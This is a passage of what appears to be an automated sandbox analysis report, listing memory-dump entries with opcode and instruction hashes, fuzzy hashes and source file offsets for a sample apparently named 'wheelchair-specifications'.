                    • Opcode ID: a08b829d69dc4510d2030a8c11dccdea8f52a70982946951281c6778963bdb01
                    • Instruction ID: 1f2a57e270a82c60aaca1b5417f4c06c2bc7926a50e7b2dbc837361de16b4556
                    • Opcode Fuzzy Hash: a08b829d69dc4510d2030a8c11dccdea8f52a70982946951281c6778963bdb01
                    • Instruction Fuzzy Hash: 65F01270F0020ACFEB58AFB995153AD7AB1AF54311F14A829D402A6285DF784541CFA5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f7667e7174637213c33655c0fecc7a446c43aab4c566a8a26d4f4e83f35c2f1
                    • Instruction ID: a30538ce2d120a23107f0f05b4c04039f679dfed3ba8459a44703e3475db2ca8
                    • Opcode Fuzzy Hash: 1f7667e7174637213c33655c0fecc7a446c43aab4c566a8a26d4f4e83f35c2f1
                    • Instruction Fuzzy Hash: EEF039B5E1020CBFCB01DFA0D9498CDFFB9EB44200F1082A6E805A2240FA315B16DF81
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9558935b7e23f14dc91d9493edad339e409022387e662465e63007fdce305fe7
                    • Instruction ID: 7138341c049f1cc1eba25ceee2ffd1d1da26e2f54ea6237ee427c16b95aa32ba
                    • Opcode Fuzzy Hash: 9558935b7e23f14dc91d9493edad339e409022387e662465e63007fdce305fe7
                    • Instruction Fuzzy Hash: 9EE0863570092827D318566B9804A6BB6DEEFC9720B15C06EE90997344DD60BC0186D5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a7ef9f186f522991bc4232179d0bf5ab7c40c97db0530b82c57101c8893ac0eb
                    • Instruction ID: a08fb260de45fdea42b5e37de946faf90d785493831c3416b790fb800b9c7373
                    • Opcode Fuzzy Hash: a7ef9f186f522991bc4232179d0bf5ab7c40c97db0530b82c57101c8893ac0eb
                    • Instruction Fuzzy Hash: E9E0C2726152625FD3029BA4ED148E93FFA9F4622634A45E7F444DF233CB288CA2C790
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 681878f4c8976503713674486a3ae2fe5411738267bcfc61540654b70e57b30e
                    • Instruction ID: a405b5c0c42dbb33921c58cb497e81df494ee57481eb991eb5b48c3bdfb45572
                    • Opcode Fuzzy Hash: 681878f4c8976503713674486a3ae2fe5411738267bcfc61540654b70e57b30e
                    • Instruction Fuzzy Hash: E9E0C2342252A16BC3166724B8186FE3F9D8F42191F4810A7F4048E0C2CB7A8B95C3F2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4ca7b8647e905e8d7840af1e82f431de766882e59c79a239f6e02ff9df967e78
                    • Instruction ID: 15a6bfb65e7d9c8887873e464e73ee4315bcd171a53683bd5545c604f38f3a22
                    • Opcode Fuzzy Hash: 4ca7b8647e905e8d7840af1e82f431de766882e59c79a239f6e02ff9df967e78
                    • Instruction Fuzzy Hash: CAF0A070620A518FC705EF38E24889A7BF2FF903007508E59D0128F660DF71ED048F90
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4662d963cbfb49d5a3970606a6b329b562a8189f21de6b882d2d7c06404f5f55
                    • Instruction ID: 8d63f7a30ca73512f5e775a2d2a87776a430e374906f15e4eb46621d5caff1ef
                    • Opcode Fuzzy Hash: 4662d963cbfb49d5a3970606a6b329b562a8189f21de6b882d2d7c06404f5f55
                    • Instruction Fuzzy Hash: DDE0203874E3504FE242FB38E8605AA3791D791624B004452D0049B245CB3D9C5687C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d90e35d208f0cf1cfa534f3eb43e143ae400da0bb0f8534e8cac43d7d12d3dea
                    • Instruction ID: 87601916bfae7a8a05cfa9cb808b82a808de83f95459f204a0f6eaaa01bb6d8b
                    • Opcode Fuzzy Hash: d90e35d208f0cf1cfa534f3eb43e143ae400da0bb0f8534e8cac43d7d12d3dea
                    • Instruction Fuzzy Hash: 6DE0C2321152957F8B029A649C00CC27FADDF9615470AC0DAF1088B12392619927A7E0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a9993d4c54401f6204bf19b59249a25897b35bba9aeff7f099e7f10b38221fac
                    • Instruction ID: 3b6f529d2956ba0e22e6a2406be7f9431cd39adc396ddc02b8dc2fa286aa3dbc
                    • Opcode Fuzzy Hash: a9993d4c54401f6204bf19b59249a25897b35bba9aeff7f099e7f10b38221fac
                    • Instruction Fuzzy Hash: 58E086757001149F8745EBADD50895677E5EF8C52532180A9E509C7315DF35AC018790
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 91edac13dc3ebd3b26a8c0d95f616e16f111488f03979e7827e039b3233bac99
                    • Instruction ID: ebe61e8b8cfc9a871648a5a8890425d25a5ed12ac6a535f0760b3ec520c41268
                    • Opcode Fuzzy Hash: 91edac13dc3ebd3b26a8c0d95f616e16f111488f03979e7827e039b3233bac99
                    • Instruction Fuzzy Hash: 5DD0953758422005D5A0F514BCC17DE7391FFC8300F6E8C15E094DB044C519C5454241
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 31ff8f4b18e66d01e069237fd7acbecd3cfed32b69af977c166b3007c031208d
                    • Instruction ID: db5c1d695aa84c0274021d675862f0a0a5d6db05543326aa77f9943e5376bff1
                    • Opcode Fuzzy Hash: 31ff8f4b18e66d01e069237fd7acbecd3cfed32b69af977c166b3007c031208d
                    • Instruction Fuzzy Hash: 92E08C30026B408FC302DB68E8408E07F74EE46308B0902D6E144CB223E724E4149B50
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25ffa87f7c045b53d773856dcd1af695755e19b8aef5f88cb8fb7f3250eac4d3
                    • Instruction ID: da02a95b63daa259e7dcc99f5c750d914ac452f608c7c97e667bd7f0f06adfb6
                    • Opcode Fuzzy Hash: 25ffa87f7c045b53d773856dcd1af695755e19b8aef5f88cb8fb7f3250eac4d3
                    • Instruction Fuzzy Hash: 71D012B70150219BC602FB2CD8A44D97B94FF81314B944C97D0C44A136D912C84CD69E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 24a29eef6acf75f6df4fe2885904281a194ad5039b729715326c9da7cb5bd89c
                    • Instruction ID: 502e5479f0afc7e2fbaba74ca323c75d7263c9afdec6f64e3091f2026a4a7637
                    • Opcode Fuzzy Hash: 24a29eef6acf75f6df4fe2885904281a194ad5039b729715326c9da7cb5bd89c
                    • Instruction Fuzzy Hash: 63E07575D0020CEFCB41DFA4D5458DDFBB9FB48201F1086AAE815A2210EA345B559F81
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5be8f3395cba6bb4014204cdfb416df90dd5345860c76fd2a4f26a68a2516789
                    • Instruction ID: 38b74e7d0b1526e2da2c75aa1d59c4d7be4eb39bd26d714f6682a7f3b74b42b3
                    • Opcode Fuzzy Hash: 5be8f3395cba6bb4014204cdfb416df90dd5345860c76fd2a4f26a68a2516789
                    • Instruction Fuzzy Hash: 32D092B5E55118DBCB009AA8E84C4EDFBB4FB8A252F019822D517F3210E7349815CA58
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9b271ed6c6b9ff1ea4034ee5f5c16dda568999ba9295ababa9e86ca826de5a40
                    • Instruction ID: 51b5e8a12e4a7fc323cc10ebb8ee86c3c4126c13477e5e59ba5931ba597e2061
                    • Opcode Fuzzy Hash: 9b271ed6c6b9ff1ea4034ee5f5c16dda568999ba9295ababa9e86ca826de5a40
                    • Instruction Fuzzy Hash: 5BE0B6B0E40209DFDB80EFB9C909A9EBFF1BF08200F1189A9D019E7251E7B496048F91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7a7afe6435644960ac338974921a5eb7d639d69f3e2b6ce31c1b37995bf236ec
                    • Instruction ID: 7d8ee9c165974d56526a84c3d149415ae655123f45c2d6b710a3ccb72e75677c
                    • Opcode Fuzzy Hash: 7a7afe6435644960ac338974921a5eb7d639d69f3e2b6ce31c1b37995bf236ec
                    • Instruction Fuzzy Hash: 04D0A731550B04CFC300FB2CD845875B7B4FF46709B450995F10597221EB21F8088781
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 45aa1efc44ca989afd57a5d794866771b71e5c0fba2b831aac53a7fd843a6c22
                    • Instruction ID: f536d4bca11263393cbe624e5adb88ff92fdfdc219100bc7af49f47b8d411e6a
                    • Opcode Fuzzy Hash: 45aa1efc44ca989afd57a5d794866771b71e5c0fba2b831aac53a7fd843a6c22
                    • Instruction Fuzzy Hash: A8D0C9323401249F9604AB58D800CA977A9DF596617414066FA05DB331CA62EC5287D4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b5b369d9ff2fcb408cd91659fad1c81880edd624fefb8cfd2e059182d7653e1d
                    • Instruction ID: b6d4ed804b2ea66b2493c21ef4d23a41e4340878f09a9e782c5518563bc3afbb
                    • Opcode Fuzzy Hash: b5b369d9ff2fcb408cd91659fad1c81880edd624fefb8cfd2e059182d7653e1d
                    • Instruction Fuzzy Hash: C9D05E310101047ECB43AE849D00FB6BF696F64318F48826DF68409422C33386239B80
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7bad33fcc150e55df0a447073fbe0eee63844ea5884d8187ad012dcd6b536c1a
                    • Instruction ID: 61609e5ec703d6eaed642365528c1b7d974bf60d86e703bd034b748e298fd502
                    • Opcode Fuzzy Hash: 7bad33fcc150e55df0a447073fbe0eee63844ea5884d8187ad012dcd6b536c1a
                    • Instruction Fuzzy Hash: 8BD02231300128A7C7186B18E40C3ED3B8CDB42691F84402BF4098A1C0CF7ACE42C3E5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 627689e9333d1ba6004a094146520da058c745fa47181e90b0b0038a1cbf00a6
                    • Instruction ID: 7dcc90c62d8467b6efdc69b5d59ab37e9a0388333bd553ffe2d1731c83003135
                    • Opcode Fuzzy Hash: 627689e9333d1ba6004a094146520da058c745fa47181e90b0b0038a1cbf00a6
                    • Instruction Fuzzy Hash: DBD012322402099F9B90FED5E844C9677ECBB54750740C862E648C7021E621F438D7A2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 764ca19e7ca64dee81bebfa7494107f5fa54c307c5b9b28d91a00182277bdb86
                    • Instruction ID: 432b44691a1a57160c84dbef7455273b703e226ea4dce209d6bbb785bdc51cb5
                    • Opcode Fuzzy Hash: 764ca19e7ca64dee81bebfa7494107f5fa54c307c5b9b28d91a00182277bdb86
                    • Instruction Fuzzy Hash: 7DC01232500118BB4B41AB89D900C86BBADEF59654705C096E5088B121D622E9129BD0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f9873673c228a6ef31486c76be4404eb70c0a61737e02b16fd2d73e436c25f3a
                    • Instruction ID: 714f3363a21976465f9c6e4c05d88795f01d2e083d0699ad8ca886e7a1c3fc5c
                    • Opcode Fuzzy Hash: f9873673c228a6ef31486c76be4404eb70c0a61737e02b16fd2d73e436c25f3a
                    • Instruction Fuzzy Hash: E7C08C7000160887C2012B94F70E7E87A687B00212F810020E60D020E1AB7E087CEA91
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c05e4ebff0f49c89454c25a8661fc1c56c7e848497eab6db46a0fc5e2d501c19
                    • Instruction ID: b141dfb8cee06deb8779e8ba2c483e79b5536ba00450feaeb1282ee69e423cf8
                    • Opcode Fuzzy Hash: c05e4ebff0f49c89454c25a8661fc1c56c7e848497eab6db46a0fc5e2d501c19
                    • Instruction Fuzzy Hash: 0AC00232144108BBCB427A81DE11E59BF2AAB55794F148055F7140D165D673D662AB90
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba11bc8631e66f44468873023bc984db7b83ccab640f7fd6267fc53999c54854
                    • Instruction ID: 81d09317fcd6e9e342e711ad039997906b051c068c99be36b53722acb1a34b83
                    • Opcode Fuzzy Hash: ba11bc8631e66f44468873023bc984db7b83ccab640f7fd6267fc53999c54854
                    • Instruction Fuzzy Hash: 04D0EAB4D18209DFDB44CF94D5486EDBBB5BB4A301F208415D41AB3280D7796E478F40
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a4b72da23c095a8b4b676e12cda2c38367918dc7b2b8204e4bed35798eb11e9d
                    • Instruction ID: 8504c01e212ac81a69b84ed4b94e7065373a31033596522f31ddae2855d4364b
                    • Opcode Fuzzy Hash: a4b72da23c095a8b4b676e12cda2c38367918dc7b2b8204e4bed35798eb11e9d
                    • Instruction Fuzzy Hash: 7CB012F57B4202F2480272B44C4C9BBE450FFF2701F90CC15F2884101086604C7A9637
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 95a3d6db988cb6c313807471bb001853079777ebfc3e75eb0778a699a1a55b65
                    • Instruction ID: bb3a99febf7f580fd5e3ea3a30eeffc3df440eef403e487f154f02abbb1f9aaa
                    • Opcode Fuzzy Hash: 95a3d6db988cb6c313807471bb001853079777ebfc3e75eb0778a699a1a55b65
                    • Instruction Fuzzy Hash: EDC02BF04034585AC708DBA0C2F409FED67B7C4300F30B287C41276384E420DB40470E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b74e190173807f7a950ba114563caefe67fd9fc76266875346250c3802292f05
                    • Instruction ID: 8369b31493b14321ade0ae964b7eb405d2d9e0ca2a31909d5ee8cc3f7c837d21
                    • Opcode Fuzzy Hash: b74e190173807f7a950ba114563caefe67fd9fc76266875346250c3802292f05
                    • Instruction Fuzzy Hash: B4C04C3C4962059FFF11FB14F54470437A4E76072DF00E622A00845109C77CF455CF51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 47286d5534887b9e4c0038efbf54abde4c29fee1f1d1039c49f18f1b904822fd
                    • Instruction ID: 424c371392e174a7f9976974dc03440d1adb758c6b965a0527af8da7931a8223
                    • Opcode Fuzzy Hash: 47286d5534887b9e4c0038efbf54abde4c29fee1f1d1039c49f18f1b904822fd
                    • Instruction Fuzzy Hash: 8AA02430000D1DCFC5013774F70F0C43F5DDD001033410050F00D400005F1F1C045540
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 94dfbc60b1a5c1ae15f072f9b5c461ee5225dd83b51b1a663bc3fbf6b0f28f79
                    • Instruction ID: f0ad927a1ad8cdd1db562c434253d53bd271264b255dfeb10b75a422424067c7
                    • Opcode Fuzzy Hash: 94dfbc60b1a5c1ae15f072f9b5c461ee5225dd83b51b1a663bc3fbf6b0f28f79
                    • Instruction Fuzzy Hash: C0A0023A149626EF9514279464615C53F74F9953207D05086C54049490AA1550049EA9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 42bb57639ffa0d2e1c6dce9ad45a7b5aa9861c190afc834f9f9ada073a4ce971
                    • Instruction ID: 0d692fd7965ce97b1c968eb4f72e2ac25c54d44f0417d140de66c357ef049ad0
                    • Opcode Fuzzy Hash: 42bb57639ffa0d2e1c6dce9ad45a7b5aa9861c190afc834f9f9ada073a4ce971
                    • Instruction Fuzzy Hash: F9B012E5C1062480C246D674DA408042A94E642680740CE3A8024470A7C374780C2682
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2096671603.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6ae0000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: PHeq
                    • API String ID: 0-2873676430
                    • Opcode ID: 9d0927569ca6148294580632ad4750cb255ef4f14e41a556424be659de68ca74
                    • Instruction ID: 6936524142ff5e8c503bac5b0329f48aac0e7ac2e5a6f7d3c581a6af6f21a89c
                    • Opcode Fuzzy Hash: 9d0927569ca6148294580632ad4750cb255ef4f14e41a556424be659de68ca74
                    • Instruction Fuzzy Hash: C9724970E00219CFCB50EFA8D984AADBBF1FF84300F1585A9D449AB255D7B0ADA5CF91
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: ax^
                    • API String ID: 0-994873808
                    • Opcode ID: 12360d26e8619e25b48a59b8a529e72996cb2b0d1f2b0f599774823ac910865c
                    • Instruction ID: 5a3022bd1220bb6b3e2ba9d901cd7730f565605826d2886f68732a97c1390800
                    • Opcode Fuzzy Hash: 12360d26e8619e25b48a59b8a529e72996cb2b0d1f2b0f599774823ac910865c
                    • Instruction Fuzzy Hash: A341AE75F2420A8BCB40CFA9C8898AEFBB5BB8D304F11892AD805E7350C234DD458B95
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2097571684.0000000007560000.00000040.00000800.00020000.00000000.sdmp, Offset: 07560000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7560000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID: ax^
                    • API String ID: 0-994873808
                    • Opcode ID: baa9ab8ee38265c7540b6280c9c138a57bebe0916698eef3d3cde4d9067a282c
                    • Instruction ID: b418cc9e98a7c62e8c9013734c2556e018a853697f6c6a779a9c1835663f7f0c
                    • Opcode Fuzzy Hash: baa9ab8ee38265c7540b6280c9c138a57bebe0916698eef3d3cde4d9067a282c
                    • Instruction Fuzzy Hash: 2441A2B5F2420A8BCB40CFA9C88989EFBF5BB8D308F15892AD405EB350C234DD458B95
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ff43658aaf1faf164edb65601bdd9f0394fb49f392084595c0030266e0150dea
                    • Instruction ID: 4205164bf15321bf2beafa0d29765f667bac5a16b408cba96053e72d208d31d0
                    • Opcode Fuzzy Hash: ff43658aaf1faf164edb65601bdd9f0394fb49f392084595c0030266e0150dea
                    • Instruction Fuzzy Hash: 45D199717017008FEB2AEB7AC454BAEB7E7AF8A704F144469C58ADB390DB35E805CB51
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1d83f95b2bb3a366e04aecb7f98f9b63794be9e4ae6c0673eb209e8edcde4848
                    • Instruction ID: 6770789a18a5b51b74a9db8d0d32ca65a2628050870696ed76ef8f21ea94d4a7
                    • Opcode Fuzzy Hash: 1d83f95b2bb3a366e04aecb7f98f9b63794be9e4ae6c0673eb209e8edcde4848
                    • Instruction Fuzzy Hash: 85E1F674E001598FCB14DFA9C5809AEFBF2FF89304F648169D815AB35AD734A981CF60
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17f8e3ea846d4224b34b5fc802e0351bc4d9fc31e8c8bb8be987e10035939887
                    • Instruction ID: 6b351c0f9c589da3262d82e58e688727ac8ed331ccc996007029f6ac6a462666
                    • Opcode Fuzzy Hash: 17f8e3ea846d4224b34b5fc802e0351bc4d9fc31e8c8bb8be987e10035939887
                    • Instruction Fuzzy Hash: D8E10874E042598FCB14DFA9C5809AEFBF2FF89304F248169D815AB356D734A981CFA0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2095006000.0000000004760000.00000040.00000800.00020000.00000000.sdmp, Offset: 04760000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4760000_#U8f6e#U6905-#U89c4#U683c.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 25009d1231e550c1240a20de12f119c257d794bbff98779c8e4a57498526ccc9
                    • Instruction ID: 2abd144b17c8095a0fee5d526fdd4c1e585d1a73a1bda1e6a10a764c36167c5b
                    • Opcode Fuzzy Hash: 25009d1231e550c1240a20de12f119c257d794bbff98779c8e4a57498526ccc9
                    • Instruction Fuzzy Hash: FDE1F874E041598FCB14DFA9C5809AEFBF2FF89304F248269D815AB356D734A981DFA0
                    Memory Dump Source
